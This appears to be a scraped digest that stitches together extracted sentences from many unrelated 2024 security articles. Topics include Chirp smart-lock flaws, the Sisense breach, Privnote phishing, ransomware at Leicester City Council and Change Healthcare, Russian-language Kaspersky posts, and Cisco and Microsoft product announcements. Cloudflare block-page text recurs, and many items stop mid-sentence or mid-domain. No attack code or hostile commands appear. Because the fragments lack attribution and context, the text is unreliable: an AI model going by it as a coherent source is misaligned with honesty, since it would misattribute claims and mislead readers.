The lock’s maker Chirp Systems remains unresponsive, even though it was first notified about the critical weakness in March 2021.

Meanwhile, Chirp’s parent company, RealPage, Inc., is being sued by multiple U.S. states for allegedly colluding with landlords to illegally raise rents.

On March 7, 2024, the U.S. Cybersecurity & Infrastructure Security Agency (CISA) warned about a remotely exploitable vulnerability with “low attack complexity” in Chirp Systems smart locks.

Neither August nor Chirp Systems responded to requests for comment.

It’s unclear exactly how many apartments and other residences are using the vulnerable Chirp locks, but multiple articles about the company from 2020 state t…

CISA urged all Sisense customers to reset any credentials and secrets that may have been shared with the company, which is the same advice Sisense gave to its customers Wednesday evening.

It is clear, however, that unknown attackers now have all of the credentials that Sisense customers used in their dashboards.

Beyond that, it is largely up to Sisense customers to decide if and when they change passwords to the various third-party services that they’ve previously entrusted to Sisense.

But when confronted with the details shared by my sources, Sisense apparently changed its mind.

“If they are hosting customer data on a third-party system like Amazon, it better damn well be encrypted,” Weave…

On April 9, Twitter/X began automatically modifying links that mention “twitter.com” to read “x.com” instead.

Those include carfatwitter.com, which Twitter/X will now truncate to carfax.com when the domain appears in user messages or tweets.

A number of these new domains including “twitter.com” appear to be registered defensively by Twitter/X users in Japan.

The domain netflitwitter.com (netflix.com, to Twitter/X users) now displays a message saying it was “acquired to prevent its use for malicious purposes,” along with a Twitter/X username.

Some of the domains registered recently and ending in “twitter.com” currently do not resolve and contain no useful contact information in their registr…

Although to be fair, it would be tough for Microsoft to eclipse the number of vulnerabilities fixed in this month’s patch batch — a record 147 flaws in Windows and related software.

Microsoft today released updates to address 147 security holes in Windows, Office, Azure, .NET Framework, Visual Studio, SQL Server, DNS Server, Windows Defender, Bitlocker, and Windows Secure Boot.

Childs said one ZDI’s researchers found this vulnerability being exploited in the wild, although Microsoft doesn’t currently list CVE-2024-29988 as being exploited.

“BlackLotus can bypass functionality called secure boot, which is designed to block malware from being able to load when booting up.

Adobe has since clar…

Fory66399 insisted that their website — privnote[.

The tornote.io website has a different color altogetherThe privatenote,io website also has a different color!

Other Privnote phishing domains that also phoned home to the same Internet address as pirwnote[.

A review of the passive DNS records tied to this address shows that apart from subdomains dedicated to tornote[.

How profitable are these private note phishing sites?

Since that story ran, KrebsOnSecurity has heard from this Saim Raza identity on two occasions.

“Hello, we already leave that fud etc before year,” the Saim Raza identity wrote.

I already leave everything.”Asked to elaborate on the police investigation, Saim Raza said he was freshly released from jail.

Now I want to start my new work.”Exactly what that “new work” might entail, Saim Raza wouldn’t say.

“After your article our police put FIR on my [identity],” Saim Raza explained.

Thread hijacking attacks.

Here’s the story of a recent thread hijacking attack in which a journalist was copied on a phishing email from the unwilling subject of a recent scoop.

Thread hijacking attacks are hardly new, but that is mainly true because many Internet users still don’t know how to identify them.

In contrast, thread hijacking campaigns tend to patiently prey on the natural curiosity of the recipient.

“We call these mutli-persona phishing scams, and they’re often paired with thread hijacking,” Kalember said.

Several Apple customers recently reported being targeted in elaborate phishing attacks that involve what appears to be a bug in Apple’s password reset feature.

“All of my devices started blowing up, my watch, laptop and phone,” Patel told KrebsOnSecurity.

They can also then remotely wipe all of the user’s Apple devices.

The engineer assured Ken that turning on an Apple Recovery Key for his account would stop the notifications once and for all.

After that, the page will display the last two digits of the phone number tied to the Apple account.

The move comes just days after a report by KrebsOnSecurity forced Onerep’s CEO to admit that he has founded dozens of people-search networks over the years.

Mozilla only began bundling Onerep in Firefox last month, when it announced the reputation service would be offered on a subscription basis as part of Mozilla Monitor Plus.

Launched in 2018 under the name Firefox Monitor, Mozilla Monitor also checks data from the website Have I Been Pwned?

“I knew Mozilla had this in the works and we’d casually discussed it when talking about Firefox monitor,” Hunt told KrebsOnSecurity.

Those include voting registries, property filings, marriage certificates, motor vehicle records, criminal records, cou…

But it’s not every day you run across a US-focused people-search network based in China whose principal owners all appear to be completely fabricated identities.

“Employees can set a special league for themselves and regularly check and compare their scores against one another.”Imagine that: Two different people-search companies mentioned in the same story about fantasy football.

Sally Stevens’ LinkedIn profile photo is identical to a stock image titled “beautiful girl” from Adobe.com.

The photo next to Ms. Fairly’s quote in Entrepreneurs matches that of a LinkedIn profile for Lynda Fairly.

ANALYSISIt appears the purpose of this network is to conceal the location of people in China who are …

The data privacy company Onerep.com bills itself as a Virginia-based service for helping people remove their personal information from almost 200 people-search websites.

Historic registration records indexed by DomainTools.com say Mr. Shelest was a registrant of onerep.com who used the email address [email protected].

Constella found that Minsk telephone number (375-292-702786) has been used multiple times in connection with the email address [email protected].

Domaintools.com finds that all of the domains mentioned in the last paragraph were registered to the email address [email protected].

Anderson said it is concerning to see a direct link between between a data removal service and …

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

Czech news agency ČTK announced on Tuesday that a hacker had managed to break into its systems and published fake news reports of a plot to murder the president of a neighbouring country.

A follow-up fake news story published by the hacker on ČTK's website and mobile app claimed that Czech Foreign Minister Jan Lipavský had commented on the alleged murder plot.

The hacker's haste in publishing false news led to careless mistakes that tipped off readers to its lack of factual basis.

Last year, security researchers described how a hacking group called "Ghostwriter" affiliated with the Belarus government had gained access to media organisations' content management systems to post false stories.…

All this and more is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans Graham Cluley and Carole Theriault.

Smashing Security listeners get 20% off!

Support the show:You can help the podcast by telling your friends and colleagues about “Smashing Security”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us:Follow the show on Twitter at @SmashinSecurity, or on Mastodon, on the Smashing Security subreddit, or visit our website for more episodes.

Follow Graham Cluley on Twitter, Mastodon, or Threads to read more of the exclusive content we post.

But the ransomware attack on Leicester City Council's infrastructure doesn't stop there.

As local media reports, residents have noticed that some street lights have been constantly shining, 24 hours a day, ever since.

He was told by the council that the ransomware attack had affected the city's "central management system" and had resulted in the street lights "misbehaving".

Perhaps it is surprising to some of us that street lights would be centrally controlled at all.

Even if the Leicester City Council wanted to pay the ransom (it says it will not),The City Council says it will not be paying any ransom.

February's crippling ransomware attack against Change Healthcare, which saw prescription orders delayed across the United States, continues to have serious consequences.

RansomHub claims 4TB of stolen data are up for sale to the highest bidder unless Change Healthcare pays a ransom.

The haul is said to also contain contracts and legal agreements between Change Healthcare and its business partners.

The ransomware attack was initially attributed to the BlackCat ransomware gang (also known as ALPHV).

None of which is good news, and raises an interesting question - how will Change Healthcare respond to the latest ransom demand?

The international hotel chain Omni Hotels & Resorts has confirmed that a cyberattack last month saw it shut down its systems, with hackers stealing personal information about its customers.

According to the firm, it took eleven days to restore systems across its properties, with staff working "tirelessly around the clock."

Omni Hotels hasn't shared details of the specific nature of the cyberattack in its official advisory, but it resembles a ransomware attack.

Sure enough, a ransomware group called the Daixin Team has claimed responsibility.

Daixin Team has been responsible for a number of high-profile attacks.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

All this and more is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans Graham Cluley and Carole Theriault.

Bitwarden is an open source password manager trusted by millions of individuals, teams, and organizations worldwide for secure password storage and sharing.

Support the show:You can help the podcast by telling your friends and colleagues about “Smashing Security”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us:Follow the show on Twitter at @SmashinSecurity, or on Mastodon, on the Smashing Security subreddit, or visit our website for more episodes.

Follow Graham Cluley on Twitter, Mastodon, or Threads to read more of the excl…

Law enforcement officers in Zambia have arrested 77 people at a call centre company they allege had employed local school-leavers to engage in scam internet users around the world.

According to Zambian authorities, Chinese-run Golden Top Support Services, based in an upmarket area of capital city Lusaka, recruited Zambian youths between the ages of 20-25, who believed they were being hired as call centre agents.

Please the people of Zambia report to us every time you are scammed.

Six properties linked to the company at the centre of the investigation have also been seized by authorities, including a luxury lakeside residence.

17 Zambian suspects have since been released, but the remainder o…

The East Central University (ECU) of Ada, Oklahoma, has revealed that a ransomware gang launched an attack against its systems that left some computers and servers encrypted and may have also seen sensitive information stolen.

In an advisory posted on its website, ECU claims that the BlackSuit ransomware gang was unsuccessful in taking down the university's critical services but were "able to conduct a successful attack on a variety of campus computers."

This is far from the first time the BlackSuit ransomware has targeted the education sector.

The BlackSuit ransomware gang most recently claimed responsibility for a cyber attack against California's Select Education Group, having compromise…

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

But on Wednesday April 3, Leicester City Council confirmed that about 25 documents had been shared online by attackers, including people’s confidential information.

And the council described the data breach as a “very serious matter.”Well, yes, it is serious if malicious hackers steal 25 documents.

But now we know that Leicester City Council’s attackers didn’t limit themselves to 25 documents.

The latest FAQ from the council reveals that a gobsmacking 1.3 terabytes of data was stolen during the data breach and published on the dark web.

If 25 documents stolen is “very serious,” I’m not sure the words exist to describe 1.3 terabytes of leaked data…Found this article interesting?

All this and much much more is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans Graham Cluley and Carole Theriault, joined this week by John Hawes.

Smashing Security listeners get 20% off!

Support the show:You can help the podcast by telling your friends and colleagues about “Smashing Security”, and leaving us a review on Apple Podcasts or Podchaser.

Follow us:Follow the show on Twitter at @SmashinSecurity, or on Mastodon, on the Smashing Security subreddit, or visit our website for more episodes.

Follow Graham Cluley on Twitter, Mastodon, or Threads to read more of the exclusive content we post.

Targus, the well-known laptop bag and case manufacturer, has been hit by a cyber attack that has interrupted its normal business operations.

In short, in order to lock the bad guys out of its network, Targus has been forced to disable large parts of its infrastructure.

The one question everyone probably has right now is - so, was this a ransomware attack?

Without SEC regulations that came into effect late last year, we might not have known so quickly about the problems Targus was experiencing.

At the time of writing, no hacking groups have publicly claimed responsibility for the attack against Targus.

Взлом Dropbox Sign: как это случилось и что в итоге утеклоНеким злоумышленникам удалось скомпрометировать сервисную учетную запись Dropbox Sign и таким образом получить доступ к внутреннему инструменту автоматической настройки платформы.

В качестве защитной меры в Dropbox сбросили пароли для всех аккаунтов Dropbox Sign и завершили все активные сессии — так что в сервис придется логиниться заново, в процессе устанавливая новый пароль.

Dropbox Sign, ранее известный как HelloSign, — это отдельный инструмент Dropbox для облачного документооборота, в первую очередь для подписания электронных документов.

Как подчеркивает компания в своем заявлении, инфраструктура Dropbox Sign «в значительной степ…

Как мы проверяем ваши данныеМы проверяем, скомпрометированы ли ваши данные и пароли, тремя способами:По адресу электронной почты для пользователей Kaspersky Standard, Kaspersky Plus и Kaspersky Premium.

Почему хранить пароли в Kaspersky Password Manager проще и безопаснееЗапоминать все пароли или держать их, например, в приложениях для заметок — небезопасно.

Он создает, хранит и автоматически подставляет надежные и уникальные пароли на веб-сайтах и в приложениях, проверяет, не скомпрометированы ли они, генерирует коды двухфакторной аутентификации.

Но как же тогда мы проверяем ваши пароли и «пробиваем» их по базам утечек?

А еще, представьте себе, на многих сервисах — в том числе и в Kaspersk…

Именно такую операционную систему — Kaspersky Thin Client 2.0 — мы и предлагаем использовать в устройствах для подключения к инфраструктуре виртуальных рабочих столов.

Что такое Kaspersky Thin Client и чем может похвастаться версия 2.0?

По сути Kaspersky Thin Client 2.0 — это обновленная операционная система для тонких клиентов, созданная в соответствии с кибериммунным подходом, а потому не требующая наложенных средств защиты.

В основе Kaspersky Thin Client лежит наша система KasperskyOS, что минимизирует риски ее компрометации даже в случае сложных атак.

Также Kaspersky Thin Client 2.0 поддерживает подключение к отдельным бизнес-приложениям на базе инфраструктуры Microsoft Remote Desktop S…

Сегодня расскажем про мошенническую схему «заработка с Toncoin» — криптовалютой, созданной на основе технологий Telegram.

Этап первый: подготовьсяДля начала мошенники предлагают зарегистрировать криптокошелек в неофициальном боте для хранения крипты в Telegram, а после указать данные своего вновь созданного кошелька в боте для «заработка» с помощью покупки ускорителей.

Дальше по инструкции скамеров жертве требуется купить 5,5–501 тонкойн (TON), при этом один TON по текущему курсу эквивалентен примерно пяти-шести долларам.

Чем круче тариф, тем выше комиссионный процент, — «байк» стоит пять тонкойнов и дает 30% комиссии, «ракета» — 500 TON и 70%.

После этого, по задумке мошенников, жертва дол…

В результате в почтовый ящик падает огромное количество подтверждений, ссылок для активации аккаунта и тому подобных писем.

В частности, в приведенном примере атаки через механизмы регистрации оператор может заблокировать письма по наличию в поле Subject слова «регистрация» на различных языках (Registrace | Registracija | Registration | Registrierung | Regisztráció).

В результате письма будут автоматически отправляться в карантин, не доходя до папки «входящие» и не перегружая почтовый сервер.

Гибкая фильтрация бизнес-рассылокРазумеется, новые возможности нашего решения можно применять не только для защиты от почтовых DDoS-атак.

Подробнее узнать о Kaspersky Secure Mail Gateway, части решения…

Какую информацию можно извлечь из перехваченных сообщений чат-ботов на основе ИИРазумеется, чат-боты отправляют сообщения в зашифрованном виде.

Чтобы понять, что же происходит в ходе этой атаки, придется слегка погрузиться в детали механики LLM и чат-ботов.

Так что для дальнейшего восстановления текста исходного сообщения из полученной последовательности длин токенов исследователи использовали именно LLM.

Как минимум два разработчика чат-ботов с ИИ — Cloudflare и OpenAI — уже отреагировали на публикацию исследования и начали использовать упомянутый выше метод дополнения (padding), который как раз и придуман для противодействия такого рода атакам.

Вероятно, остальные разработчики чат-ботов с…

А может быть, даже задавались закономерным вопросом, не рассылает ли кто-нибудь вредоносные письма и от имени вашей компании.

Вредоносная кампания SubdoMailing и угон доменов у организацийИсследователи из Guardio Labs обнаружили масштабную кампанию по рассылке спама, которую они назвали SubdoMailing.

Угон доменов с настроенной записью CNAMEКак же именно злоумышленники используют захват чужих доменов?

Примеры угона доменов в ходе кампании SubdoMailingКак вообще могут возникать подобные проблемы, легко понять по случаю с сайтом msnmarthastewartsweeps.com .

Как защититься от SubdoMailingЧтобы предотвратить угон доменов и рассылку спама от имени вашей компании, мы рекомендуем следующее:

О том, как эта совместимость будет реализована в WhatsApp и Messenger*, недавно написали инженеры Meta*.

Можно ли переписываться в WhatsApp с пользователями других мессенджеров?

Теперь эти партнеры должны появиться, разработать мост между своим сервисом и WhatsApp и запустить его.

Пока об этом известно только из бета-версий WhatsApp — для переписок со сторонними сервисами будет отдельный подраздел в приложении, чтобы отделить их от чатов с пользователями WhatsApp.

Если вы пользуетесь WhatsApp и обдумываете общение с абонентами других сервисовОцените, сколько людей в вашем окружении не используют WhatsApp, но пользуются иными сервисами, объявившими о совместимости с WhatsApp.

Они нашли способ кражи данных из камер видеонаблюдения путем анализа паразитного электромагнитного излучения и назвали эту атаку EM Eye.

Этот «приемник» собирает данные, последующая обработка которых позволяет реконструировать картинку с камеры наблюдения в соседней секретной комнате.

В результате из состояния «почти ничего не видно» получается прекрасное изображение, не хуже, чем в оригинале, разве что с традиционными для нейросетей артефактами.

Но что, если подарить потенциальной жертве, ну, например, слегка модифицированный переносной аккумулятор?

Они разрабатываются не для того, чтобы подсматривать за кем-то уже завтра.

Конечно, что все это выполнимо при помощи коммерческих VPN и прокси на базе дата-центров.

Серый рынок proxywareСитуация с домашними прокси сложна, потому что на этом рынке и продавцы, и покупатели, и участники, бывают как абсолютно легитимные (добровольные, соблюдающие лучшие практики), так и откровенно незаконные.

Иногда это связано с тем, что некоторые ПДП покупают инфраструктуру у субподрядчиков и о происхождении прокси не знают сами.

Злоумышленники все чаще пытаются арендовать домашние прокси в регионе, близком к офису атакуемой организации.

Применение прокси для целей бизнеса.

Подделка изображений в фоторедакторах встречалась и ранее, но появление генеративного ИИ вывело подделки на новый уровень.

Подделка изображений и видео имеет прямое отношение к кибербезопасности.

На сайтах знакомств и в других соцсетях жулики тоже активно используют сгенерированные изображения для своего профиля.

Начнем со случаев, когда изображение не генерируется и не редактируется, — например, настоящий снимок из региона боевых действий выдается за фотографию из другого региона или кадр из художественного фильма преподносится как документальный.

Настоящие фото и видео, сделанные камерой или смартфоном, с метками даты, времени и геопозиции, будет практически невозможно выдать за изображен…

А после масштабных ransomware-инцидентов последних лет не стоит сбрасывать со счетов и возможность взлома сервисов заметок и массовой утечки пользовательских (ваших!)

Сохранить все удобства цифровых заметок и уберечь их от посторонних глаз поможет сквозное шифрование.

Поэтому для по-настоящему конфиденциальных заметок существуют отдельные, хоть и менее известные приложения, которые мы сегодня рассмотрим и сравним.

Сквозное шифрование для синхронизации включено по умолчанию, заметки зашифрованы и на самом устройстве, для входа в сервис используется двухфакторная аутентификация.

Поэтому в дополнение к одному из конфиденциальных приложений для заметок обязательно используйте комплексную систем…

Кроме телефонов и компьютеров, в этом участвуют смарт-часы, умные ТВ и колонки и даже автомобили.

Как выясняется, эти залежи информации используются не только рекламными агентствами, для того чтобы предложить вам лучший пылесос или страховку.

За кулисами контекстной рекламыРанее мы подробно описывали, как данные собираются на веб-страницах и в приложениях, но не уделяли внимания механизму их использования.

Затем DSP вступает в аукцион за нужные виды рекламы (баннер, видео и тому подобное), отображаемые на этих сайтах и в приложениях.

Как защититься от слежки через рекламуПоскольку все вышеописанные компании используют для сбора данных «центральные узлы» рекламной сети — большие рекламные би…

Но в последнее время кибератаки зашли слишком далеко: недавно злоумышленники сорвали крупный турнир по Apex Legends.

При этом потенциальный виновник не уточнил, где была уязвимость: в самой игре Apex Legends, в обязательном для кибертурниров ПО Easy Anti-Cheat или же в какой-либо другой программе.

Представители античита заявили, что их ПО в порядке.

Посреди матча Иван зашел на трансляцию своей же игры на Twitch — таким образом он мог получить преимущество, ведь на трансляции отображается расстановка сил обеих команд.

Также скептики любят приводить примеры, когда в важнейший момент игры на экране появлялось надоедливое уведомление антивируса.

Я знаю, что это звучит как бред, но таков сюжет фильма, это не первоапрельская шутка.

А на месте дочери разумно было бы заранее установить на машину надежное защитное решение, которое и от вирусов убережет, и внезапно открывающиеся окна заблокирует.

Кроме оружия и амуниции Клэй также завладевает ее паролем (DR07Z, напечатан на бумажке) и проникает в информационные системы пасечников.

Применяемые в ней эксплойт EternalBlue и бэкдор DoublePulsar предположительно были украдены у разведывательных структур и выложены в открытый доступ.

А значит, следует быть готовыми ко всему и использовать надежные защитные инструменты и на личных устройствах, и для защиты компаний.

Cisco has created such a fabric — Cisco Hypershield — that we discuss in the paragraphs below.

Virtual/Container Network Enforcement Point: Here, a software network enforcement point runs inside a virtual machine or container.

Centralized security policyThe usual retort to distributed security enforcement is the nightmare of managing independent security policies per enforcement point.

The administrator’s faith in the security fabric — Cisco Hypershield — deepens after a few successful runs through the segmentation process.

ConclusionIn both the examples discussed above, we see Cisco Hypershield function as an effective and efficient security fabric.

I’m proud to announce Cisco Hypershield, the first truly distributed, AI-native system that puts security wherever it needs to be: in every software component of every application running on your network; on every server; and in your public or private cloud deployments.

They converted these products into thousands of pieces of software — including security software — that could run on every server.

Built within the Cisco Security Cloud, Hypershield, plus the processing, protection, and data capabilities within Splunk, will create a transformative hyperscale datacenter that not only leads the AI revolution, but protects it.

We’ll share more soon, but for now, you can expect Cisco Hypershield…

Cisco XDR is a leader in providing comprehensive threat detection and response across the entire attack surface.

Cutting-Edge Innovations in Cisco XDRAt the heart of these innovations is the Cisco AI Assistant in XDR.

The Cisco AI Assistant gives analysts contextual insights, guided responses, and best next steps.

We will also show Cisco Identity Intelligence capabilities.

Cisco XDR can detect and respond to sophisticated identity-based attacks with accuracy and speed by incorporating identity as a source of telemetry.

Two leading players in this space, Cisco’s Duo Security and Cisco Identity Intelligence, have emerged as champions in Identity Threat Detection & Response.

The Power of Identity Threat Detection & ResponseIdentity Threat Detection & Response (ITDR) has become a vital aspect of modern cybersecurity.

Cisco Identity Intelligence: Elevating Cybersecurity PreparednessCisco Identity Intelligence brings an additional layer of protection to the table with its advanced capabilities in anomaly detection and behavioral analytics.

How Cisco Identity Intelligence Complements Cisco’s Duo SecurityEnhanced Anomaly Detection: While Cisco’s Duo Security provides robust MFA and access controls, Cisco Identity…

Cisco Telemetry Broker (CTB) Release 2.1.3 is generally available as of March 25, 2024.

Cisco Telemetry Broker is the answer.

It can broker hybrid cloud data, filter unneeded data, and transform data into a more usable format.

Produces Telemetry for Devices that Cannot Generate NetFlow NativelyTo support the notion of an intelligent telemetry plane, there is a need to generate NetFlow for devices that might not be capable of generating the protocol natively.

Additionally, the CTB Broker to CTB Manager data bandwidth was optimized which improves overall performance significantly and allows scalability of the Manager node.

It’s one thing to claim leadership in cloud security; it’s another to have that leadership acknowledged by industry experts.

That’s why we’re thrilled to announce our recent recognition by Frost & Sullivan as the 2024 Customer Value Leader in the Global Security Service Edge Industry.

Frost & Sullivan’s Customer Value Leadership Award recognizes the company that offers products or services customers find superior for the overall price, performance, and quality.

Vendors are evaluated on business impact criteria (including financial performance, customer acquisition, operational efficiency, growth potential, and human capital) and customer impact criteria (price/performance value, customer pu…

These attackers used compromised credentials to repeatedly attempt to sign in to the company’s real Microsoft 365 page, triggering the series of MFA notifications—an attack technique known as MFA exhaustion.

According to this quarter’s Talos IR report, using compromised credentials on valid accounts was one of two top initial access vectors.

How credentials are compromisedPhishing, while one of the most popular methods, isn’t the only way that attackers gather compromised credentials.

Reducing the impact of compromised credentialsIt goes without saying that protecting credentials from being compromised and abused is important.

To illustrate, let’s look at when the threat actor begins hammer…

Blockchain security, by its very nature, often diverges from standard cybersecurity practices originating from its decentralized, immutable, and cryptographic nature.

The hashrate originates from the processing power of validator nodes that lend their computational power to validate and secure blockchain transactions.

There are four main types of blockchains:Public : Anyone can read and write (transact) on a public blockchain such as Bitcoin.

In evaluating blockchain risk levels, public blockchains typically present the lowest risk.

Proof-of-work is extensively used in cryptocurrency and is generally a secure method for validating blockchain transactions .

Let’s look at this from the lens of a customer-impacting factor that may make security operations less predictable: security incidents.

According to our latest Security Outcomes Report:According to our 2024 Cybersecurity Readiness Index, 54% of organizations said they have experienced a cybersecurity incident in the last 12 months.

The latest Security Outcomes Report shows preventing incidents and mitigating losses are the top priorities for security resilience overall.

Ensuring leadership is aligned with the organization’s approach to balancing agility and predictability.

In our goal to balance agility with predictability, we have implemented some specific aspects to processes that work be…

For years, analysts, security specialists, and security architects alike have been encouraging organizations to become DMARC compliant.

These attacks were initially reported by Guardio Labs who reported the discovery of 8,000 domains and 13,000 subdomains being used for these types of attacks since 2022.

In the customer’s instance of Red Sift OnDMARC, they noticed email was coming from a sender with a poor reputation and a subdomain that appeared unrelated to their customer’s main domain.

But these emails had fully passed SPF checks with the customer’s current SPF record.

If you’re a Cisco Secure Email customer, find out how you can quickly add Red Sift domain protection to your security su…

In Cisco XDR, “Playbooks” are the strategic guides for robust incident response, designed to streamline the identify, contain, and eradicate processes for cyber threats.

The Playbook EditorWhen you open the Editor for the first time, only the Cisco Managed Incident Playbook is displayed and is designated as the “Default” Playbook.

If the Incident does not match any rules assigned to playbooks, the default playbook is assigned to the Incident.

Once a playbook is assigned to an Incident, the assignment Incident cannot be changed, even if the playbook is edited.

In this blog post, we have discussed the evolution and significance of Cisco XDR in standardizing the incident response process, enha…

Cisco Secure Workload allows enterprise customers to proactively microsegment their applications in an infrastructure, location, and form factor agnostic manner.

With Cisco Secure Workload 3.9, we introduced the Nvidia Bluefield DPU integration which allows the offloading of Secure Workload Agent functionality from hosts to Nvidia Bluefield DPUs.

Under the hood, the control plane logic of the Cisco Secure Workload agent operates on the ARMv8+ CPUs.

Cisco Secure Workload – Nvidia DPU integration fosters a flexible deployment approach which reduces organizational barriers, greatly enhances practitioner experiences, and accelerates the time to value.

Cisco Secure Workload tackles the complexit…

Zero Trust Network Access (ZTNA) is a critical component to increase productivity and reduce risk in today’s hyper-distributed environments.

Cisco Secure Access provides a modern form of zero trust access that utilizes a new architecture to deliver a unique level of security and user convenience.

We’re proud to announce that our innovative security service edge (SSE) solution, Cisco Secure Access, has been named an Overall Leader in the KuppingerCole Zero Trust Network Access (ZTNA) Leadership Compass.

Recognizing the shift towards distributed and hybrid work models, Cisco Secure Access is engineered to modernize cybersecurity strategies, enabling organizations to implement zero trust with …

Join the guided tour outside the Security Operations Center, where we’ll discuss real time network traffic of the RSA Conference, as seen in the NetWitness platform.

Engineers will be using Cisco Security Cloud in the SOC, comprised of Cisco Breach Protection Suite, User Protection Suite, Cloud Protection Suite and Secure Firewall.

Please fill out the RSAC SOC Tour Request Form to request your spot.

Ask a Question, Comment Below, and Stay Connected with Cisco Security on social!

Cisco Security Social ChannelsInstagramFacebookTwitterLinkedInShareShare:

In response, organizations have adopted security service edge (SSE) solutions, such as Cisco Secure Access, to protect users regardless of where they are located or what they are accessing.

Experience insights is a core component of Secure Access, which means all its data and alerts are provided in the same management portal as the rest of Secure Access’ capabilities.

In addition, all Secure Access capabilities, including Experience Insights, rely on the Cisco Secure Client, a single agent on the end-user’s machine.

Experience insights is just one capability of an incredible solutionWhile experience insights is our latest announcement, Secure Access includes many capabilities, including a s…

Today, we’re announcing passkey support for Microsoft consumer accounts, the next step toward our vision of simple, safe access for everyone.

Starting today, you can use a passkey to access your Microsoft account using your face, fingerprint, or device PIN on Windows, Google, and Apple platforms.

Creating a passkey for your Microsoft accountCreating a passkey for your Microsoft account is easy.

Signing into your Microsoft account using a passkeyWhen you sign in to your Microsoft account, you can use your passkey by choosing Sign-in options and then selecting face, fingerprint, PIN, or security key.

Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news an…

This blog was co-authored by Alex Weinert, VP Identity Security and Ramya Chitrakar, CVP Apps and Identity.

Today we are thrilled to announce that Microsoft has been recognized as an overall leader in the KuppingerCole Leadership Compass Identity Threat Detection and Response: IAM Meets the SOC.

Figure 1: ITDR Leadership compass with Microsoft as a leaderStreamline your identity protection with ITDR and generative AIAt Microsoft, we look at ITDR as a set of capabilities at the intersection of Identity and Access Management (IAM) and Extended Detection and Response (XDR).

Proactively protect your on-premises resources and harden your identity posture: Misconfiguration s in identity infrastru…

Microsoft remains committed to working with the security community to share vulnerability discoveries and threat intelligence to protect users across platforms.

We also wish to thank Google’s Android Application Security Research team for their partnership in resolving this issue.

For example, it’s very common for Android applications to read their server settings from the shared_prefs directory.

RecommendationsRecognizing that this vulnerability pattern may be widespread, we shared our findings with Google’s Android Application Security Research team.

We collaborated with Google to author guidance for Android application developers to help them recognize and avoid this pattern.

Challenges in ICS forensicsICS forensics differs from standard IT forensics, because ICS environments possess distinctive features that distinguish them.

In contrast, forensics in OT environments involves analyzing ICS data, including data from sensors and controllers used in manufacturing and industrial settings.

Specialized tools and techniques have started to emerge to address the unique challenges of conducting investigations in ICS environments.

Defender for IoT, or any other OT security solution, can help with both proactive and reactive OT incident response.

To get started with OT security, watch the “Introduction to ICS/OT Security” webinar series, hosted by Microsoft Security Commu…

Insight #3: Effective cybersecurity takes a good partnerThe next wave of multicloud security with Microsoft Defender for Cloud Read moreKeeping user needs in mind, Microsoft has its own CNAPP solution—Microsoft Defender for Cloud.

Operationalizing Microsoft Defender for Cloud takes both integrating it into daily operations and satisfying your users’ needs by continuously evolving cloud security.

Strengthening the SOC even further is a new Microsoft Defender for Cloud integration with Microsoft Defender XDR.

The future holds significant promise for CNAPP, and Microsoft is leading in this effort with solutions like Microsoft Defender for Cloud.

Also, follow us on LinkedIn (Microsoft Security)…

To help like-minded defenders tackle this difficult task, Microsoft Incident Response experts have created a guide on using Windows Internals for forensic investigations.

Guidance for Incident Responders The new guide from the Microsoft Incident Response team helps simplify forensic investigations.

Understanding these artifacts will strengthen your ability to conduct Windows forensic analysis.

Shimcache’s forensic evolution : The Shimcache has long served as a source of forensic information, particularly as evidence of program execution.

Forensic insights with SRUM : SRUM’s tracking of application execution, network activity, and resource consumption is a boon for forensic analysts.

Microsoft Threat Intelligence is publishing results of our longstanding investigation into activity by the Russian-based threat actor Forest Blizzard (STRONTIUM) using a custom tool to elevate privileges and steal credentials in compromised networks.

Forest Blizzard often uses publicly available exploits in addition to CVE-2022-38028, such as CVE-2023-23397.

In addition to patching, this blog details several steps users can take to defend themselves against attempts to exploit Print Spooler vulnerabilities.

Forest Blizzard primarily targets government, energy, transportation, and non-governmental organizations in the United States, Europe, and the Middle East.

To hear stories and insights f…

Microsoft recently uncovered an attack that exploits new critical vulnerabilities in OpenMetadata to gain access to Kubernetes workloads and leverage them for cryptomining activity.

Attack flowFor initial access, the attackers likely identify and target Kubernetes workloads of OpenMetadata exposed to the internet.

Once they identify a vulnerable version of the application, the attackers exploit the mentioned vulnerabilities to gain code execution on the container running the vulnerable OpenMetadata image.

In this specific case, the attackers’ actions triggered Microsoft Defender for Containers alerts, identifying the malicious activity in the container.

Microsoft Defender Cloud Security Pos…

Today, we are excited to announce Zero Trust activity-level guidance for DoD Components and DIB partners implementing the DoD Zero Trust Strategy.

In this blog, we’ll review the DoD Zero Trust Strategy and discuss how our new guidance helps DoD Components and DIB partners implement Zero Trust.

We’ll cover the Microsoft Zero Trust platform and relevant features for meeting DoD’s Zero Trust requirements, and close with real-world DoD Zero Trust deployments.

Microsoft supports the DoD’s Zero Trust StrategyThe DoD released its formal Zero Trust Strategy in October 2022.1 The strategy is a security framework and mindset that set a path for achieving Zero Trust.

There are 152 Zero Trust activitie…

We’re thrilled to announce that Forrester has recognized Microsoft as a Leader in the Forrester Wave™: Workforce Identity Platforms, Q1 2024 report.

In The Forrester Wave™ report, Forrester recognized Microsoft Entra for its adaptive policy engine, well-integrated identity lifecycle management, and end-to-end approach to identity threat detection.

Bookmark the Microsoft Entra blog to keep up with our expert coverage on workforce identity matters.

Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

Forrester Wave™: Workforce Identity Platforms, Q1 2024, Geoff Cairns, Merrit Maxim, Lok Sze Sung, Pater Harrison.

